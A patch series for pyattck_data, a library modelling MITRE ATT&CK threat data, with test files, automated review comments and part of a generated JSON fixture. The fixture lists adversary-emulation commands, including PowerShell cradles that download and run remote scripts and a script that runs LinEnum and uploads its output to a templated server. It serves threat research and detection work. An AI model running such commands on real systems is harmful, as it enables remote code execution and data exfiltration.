"selection": { + "type": "EXECVE", + "a0": [ + "users", + "w", + "who" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "reference": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "c2_data": { + "name": "Alan", + "license": "Created Commons", + "price": "NA", + "github": "https://github.com/enkomio/AlanFramework", + "site": "", + "twitter": "@s4tan", + "evaluator": "@s4tan", + "date": "9/10/2021", + "version": "4", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET", + "implant": "C/Asm", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "All code is executed in memory" + } +} + +def test_add_actor_item(): + data = GeneratedData() + data.add_actor_item( + country=SAMPLE_DATA["country"], + names=SAMPLE_DATA["names"], + targets=SAMPLE_DATA["targets"], + operations=SAMPLE_DATA["operations"], + description=SAMPLE_DATA["description"], + tools=SAMPLE_DATA["tools"], + links=SAMPLE_DATA["links"], + attck_id=SAMPLE_DATA["attck_id"], + comment=SAMPLE_DATA["comment"] + ) + assert data.last_updated + assert data.actors + assert len(data.actors) == 1 + for actor in 
data.actors: + assert actor.attck_id == SAMPLE_DATA["attck_id"] + assert hasattr(actor, 'attck_id') + for key,val in SAMPLE_DATA.items(): + if hasattr(actor, key): + assert len(getattr(actor, key)) == len(val) + + +def test_add_tool_item(): + data = GeneratedData() + data.add_tool_item( + names=SAMPLE_DATA["names"], + comments=SAMPLE_DATA["comment"], + family=SAMPLE_DATA["family"], + links=SAMPLE_DATA["links"] + ) + assert data.last_updated + assert data.tools + assert len(data.tools) == 1 + for tool in data.tools: + for key,val in SAMPLE_DATA.items(): + if hasattr(tool, key): + assert len(getattr(tool, key)) == len(val) + +def test_add_command(): + data = GeneratedData() + data.add_command( + technique_id=SAMPLE_DATA["technique_id"], + source=SAMPLE_DATA["source"], + command=SAMPLE_DATA["command"], + name=SAMPLE_DATA["name"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.commands + for command in technique.commands: + assert command.command == SAMPLE_DATA["command"] + assert command.command in technique.command_list + assert command.source == SAMPLE_DATA["source"] + assert command.name == SAMPLE_DATA["name"] + +def test_add_dataset(): + data = GeneratedData() + data.add_dataset( + technique_id=SAMPLE_DATA["technique_id"], + content=SAMPLE_DATA["content"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.parsed_datasets + for dataset in technique.parsed_datasets: + assert dataset == SAMPLE_DATA["content"] + +def test_add_possible_queries(): + local_data = { + "content": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path 
contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + } + data = GeneratedData() + data.add_possible_queries( + technique_id=SAMPLE_DATA["technique_id"], + product=SAMPLE_DATA["product"], + content=local_data["content"], + name=SAMPLE_DATA["name"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.queries + for query in technique.queries: + assert query.product == SAMPLE_DATA["product"] + assert query.name == SAMPLE_DATA["name"] + assert query.query == local_data["content"] + +def test_add_possible_detection(): + data = GeneratedData() + data.add_possible_detection( + technique_id=SAMPLE_DATA["technique_id"], + data=SAMPLE_DATA["data"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.possible_detections + assert technique.possible_detections[0] == SAMPLE_DATA["data"] + +def test_add_external_reference(): + data = GeneratedData() + data.add_external_reference( + technique_id=SAMPLE_DATA["technique_id"], + reference=SAMPLE_DATA["reference"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.external_reference + assert technique.external_reference[0] == SAMPLE_DATA["reference"] + +def test_add_c2_data(): + data = GeneratedData() + data.add_c2_data(SAMPLE_DATA["c2_data"]) + assert data.last_updated + assert data.c2_data + assert len(data.c2_data) == 1 + for c2 in data.c2_data: + for key,val in SAMPLE_DATA["c2_data"].items(): + assert hasattr(c2, key) + assert getattr(c2, key) == val 
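Review bot: `SAMPLE_DATA` defines `names`, `links`, `name` and `content` twice each; Python silently keeps the last value, so `test_add_dataset` actually runs against the Sysmon query string rather than the dict literal it appears to use, and the actor test gets `names == ["PowerShell", "Python"]`. Split the fixture per test (or at least make the keys unique) so each test asserts against the value it visibly declares. `GENERATED_ATTCK_JSON = json.load(open("tests/resources/generated_attck_data.json"))` leaks the file handle, parses the large fixture at import time, and is never used in the module — drop it, or load it inside a `with open(...) as fh:` where it is needed. `test_add_tool_item` passes `comments=SAMPLE_DATA["comment"]` although a `comments` key exists; confirm which was intended.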
diff --git a/tests/test_main.py b/tests/test_main.py new file mode 100644 index 0000000..8e7e82d --- /dev/null +++ b/tests/test_main.py @@ -0,0 +1,17 @@ +"""Test cases for the __main__ module.""" +import pytest +from click.testing import CliRunner + +from pyattck_data import __main__ + + +@pytest.fixture +def runner() -> CliRunner: + """Fixture for invoking command-line interfaces.""" + return CliRunner() + + +def test_main_succeeds(runner: CliRunner) -> None: + """It exits with a status code of zero.""" + result = runner.invoke(__main__.main) + assert result.exit_code == 0 diff --git a/tests/test_models.py b/tests/test_models.py new file mode 100644 index 0000000..e28c081 --- /dev/null +++ b/tests/test_models.py 
@@ -0,0 +1,120 @@ +# -*- coding: utf-8 -*- +import requests + +from pyattck_data.models.attack import MitreAttck +from pyattck_data.models.generated import GeneratedData +from pyattck_data.models.nist import NistControls, GeneratedNistControlMap +from pyattck_data.models.malware import Malware +from pyattck_data.models.tool import Tool +from pyattck_data.models.actor import Actor +from pyattck_data.models.datacomponent import DataComponent +from pyattck_data.models.datasource import DataSource +from pyattck_data.models.mitigation import Mitigation +from pyattck_data.models.tactic import Tactic +from pyattck_data.models.technique import Technique + +ENTERPRISE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_enterprise_attck_v1.json").json() +PRE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_pre_attck_v1.json").json() +MOBILE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_mobile_attck_v1.json").json() +ICS_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_ics_attck_v1.json").json() +GENERATED_NIST_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/attck_to_nist_controls.json").json() +NIST_CONTROLS_JSON = requests.get("https://raw.githubusercontent.com/center-for-threat-informed-defense/attack-control-framework-mappings/main/frameworks/attack_10_1/nist800_53_r4/stix/nist800-53-r4-controls.json").json() + + + +ENTERPRISE_OBJ = MitreAttck(**ENTERPRISE_ATTCK_JSON) + + +def test_enterprise(): + assert MitreAttck(**ENTERPRISE_ATTCK_JSON) + +def test_ics(): + assert MitreAttck(**ICS_ATTCK_JSON) + +def test_mobile(): + assert MitreAttck(**MOBILE_ATTCK_JSON) + +def test_pre_attck(): + assert MitreAttck(**PRE_ATTCK_JSON) + +def test_nist_controls(): + assert NistControls(**NIST_CONTROLS_JSON) + +def test_controls(): + assert GeneratedNistControlMap(**{"data": GENERATED_NIST_JSON}) + +def test_actor(): + 
for item in ENTERPRISE_OBJ.objects: + if item.type == 'intrusion-set': + for malware in item.malwares: + assert isinstance(malware, Malware) + try: + if item.tools: + for tool in item.tools: + assert isinstance(tool, Tool) + except: + pass + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_datacomponent(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-data-component': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_datasource(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-data-source': + for technique in item.techniques: + assert isinstance(technique, Technique) + for component in item.data_components: + assert isinstance(component, DataComponent) + +def test_malware(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'malware': + for technique in item.techniques: + assert isinstance(technique, Technique) + for actor in item.actors: + assert isinstance(actor, Actor) + +def test_mitigation(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'course-of-action': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_tactic(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-tactic': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_technique(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'attack-pattern': + for actor in item.actors: + assert isinstance(actor, Actor) + for component in item.data_components: + assert isinstance(component, DataComponent) + for source in item.data_sources: + assert isinstance(source, DataSource) + for malware in item.malwares: + assert isinstance(malware, Malware) + for mitigation in item.mitigations: + assert isinstance(mitigation, Mitigation) + for tactic in item.tactics: + assert isinstance(tactic, Tactic) + for technique in item.techniques: + assert isinstance(technique, Technique) + for tool in 
item.tools: + assert isinstance(tool, Tool) + +def test_tactic(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'tool': + for technique in item.techniques: + assert isinstance(technique, Technique) + for actor in item.actors: + assert isinstance(actor, Actor) diff --git a/tests/test_types.py b/tests/test_types.py new file mode 100644 index 0000000..cb72232 --- /dev/null +++ b/tests/test_types.py 
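Review bot: `test_tactic` is defined twice in test_models.py; the second definition (iterating `type == 'tool'`) replaces the first at import, so the tactic→technique check is never collected — rename the second to `test_tool`. In `test_actor`, the bare `except: pass` around the tools loop also swallows `AssertionError`, so `assert isinstance(tool, Tool)` can never fail; remove the try/except or narrow it to the exception you actually expect (e.g. `except AttributeError:` if some intrusion-sets lack `tools`) with a comment saying why. The six module-level `requests.get(...).json()` calls run at collection time with no `timeout=` or `raise_for_status()`, so any network hiccup fails every test in the file with an unrelated traceback; a module-scoped fixture would at least keep the failure attributable.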
@@ -0,0 +1,63 @@
+# -*- coding: utf-8 -*-
+import pytest
+
+
+from pyattck_data.models.types import (
+ Id,
+ MitreDomain,
+ MitrePlatform,
+ PATTERNS,
+ SemVersion
+)
+
+
+def test_id_type():
+ for example in PATTERNS["types"]["examples"]:
+ assert Id().validate(example)
+
+ with pytest.raises(ValueError) as excinfo:
+ Id().validate('asdefasdf')
+ assert "Invalid Id attribute" in str(excinfo.value)
+
+ with pytest.raises(ValueError) as excinfo:
+ Id().validate('asdefasdf-')
+ assert "Invalid Id attribute" in str(excinfo.value)
+
+
+def test_semversion_type():
+ for example in PATTERNS["semversion"]["examples"]:
+ assert SemVersion().validate(example)
+
+ with pytest.raises(ValueError) as excinfo:
+ SemVersion().validate('asdefasdf')
+ assert "Invalid SemVersion format" in str(excinfo.value)
+
+ with pytest.raises(ValueError) as excinfo:
+ SemVersion().validate('0000')
+ assert "Invalid SemVersion format" in str(excinfo.value)
+
+
+def test_mitre_domain_type():
+ for example in PATTERNS["domains"]["examples"]:
+ assert MitreDomain().validate(example)
+
+ with pytest.raises(ValueError) as excinfo:
+ MitreDomain().validate('asdefasdf')
+ assert "Invalid MitreDomain attribute" in str(excinfo.value)
+
+ with pytest.raises(ValueError) as excinfo:
+ MitreDomain().validate('0000')
+ assert "Invalid MitreDomain attribute" in str(excinfo.value)
+
+
+def test_mitre_platform_type():
+ for example in PATTERNS["platforms"]["examples"]:
+ assert MitrePlatform().validate(example)
+
+ with pytest.raises(ValueError) as excinfo:
+ MitrePlatform().validate('android')
+ assert "Invalid MitrePlatform attribute" in str(excinfo.value)
+
+ with pytest.raises(ValueError) as excinfo:
+ MitrePlatform().validate('relationship')
+ assert "Invalid MitrePlatform attribute" in str(excinfo.value)
From e5691492e9f1991c4a9f22908aa4a01326877ea5 Mon Sep 17 00:00:00 2001
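Review bot: Each positive case in this file, starting with `for example in PATTERNS["types"]["examples"]:` in test_id_type, passes vacuously if the examples list is empty, since nothing asserts that the loop body ran at all; a guard such as `assert PATTERNS["types"]["examples"]` before each loop, or `@pytest.mark.parametrize` over the example lists, would make an empty or mis-keyed table fail visibly. The negative cases can also drop the `excinfo` round-trip by using pytest's message matcher, e.g. `with pytest.raises(ValueError, match="Invalid Id attribute"):` followed by `Id().validate('asdefasdf')`. The Id examples are read under the key `"types"` while the other validators read `"semversion"`, `"domains"` and `"platforms"`; if that key name is deliberate, a one-line comment at the first loop would save the next reader from suspecting a typo (PATTERNS itself is defined outside this hunk). The `'android'` rejection in test_mitre_platform_type presumably encodes case-sensitive platform names; stating that in a comment would make the intent of that case clear.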
From: MSAdministrator Date: Thu, 9 Jun 2022 13:53:49 -0500 Subject: [PATCH 2/4] dev: Adding test resource --- tests/resources/generated_attck_data.json | 224780 +++++++++++++++++++ 1 file changed, 224780 insertions(+) create mode 100644 tests/resources/generated_attck_data.json diff --git a/tests/resources/generated_attck_data.json b/tests/resources/generated_attck_data.json new file mode 100644 index 0000000..66a8c72 --- /dev/null +++ b/tests/resources/generated_attck_data.json 
@@ -0,0 +1,224780 @@ +{ + "last_updated": "2022-05-26 10:03:52.536173", + "techniques": [ + { + "technique_id": "T1082", + "command_list": [ + "ver", + "shell ver", + "set", + "shell set", + "get_env.rb", + "net config workstation\nnet config server", + "shell net config workstation\nshell net config server", + "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "sysinfo, run winenum, get_env.rb", + "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "system_profiler\nls -al /Applications\n", + "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi;\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i 
\"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "hostname\n", + "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "cscript PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs", + "set\n", + "env\n", + "csrutil status\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon 
-noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "$PSVersionTable\n", + "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n", + "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "[environment]::OSVersion.Version\n", + "powershell/situational_awareness/host/computerdetails", + "powershell/situational_awareness/host/winenum", + "powershell/situational_awareness/network/powerview/get_computer" + ], + "commands": [ + { + "command": "ver", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell ver", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "set", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell set", + "source": 
"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "get_env.rb", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net config workstation\nnet config server", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net config workstation\nshell net config server", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "sysinfo, run winenum, get_env.rb", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "system_profiler\nls -al /Applications\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi;\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "source": 
"atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "hostname\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "cscript PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test 
- System Information Discovery" + }, + { + "command": "set\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "env\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "csrutil status\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": 
"Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$PSVersionTable\n", + "source": "data/abilities/discovery/29451844-9b76-4e16-a9ee-d6feab4b24db.yml", + "name": "Discover the PowerShell version" + }, + { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n", + "source": "data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml", + "name": "Discover all directories containing deletable files by user" + }, + { + "command": "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "source": 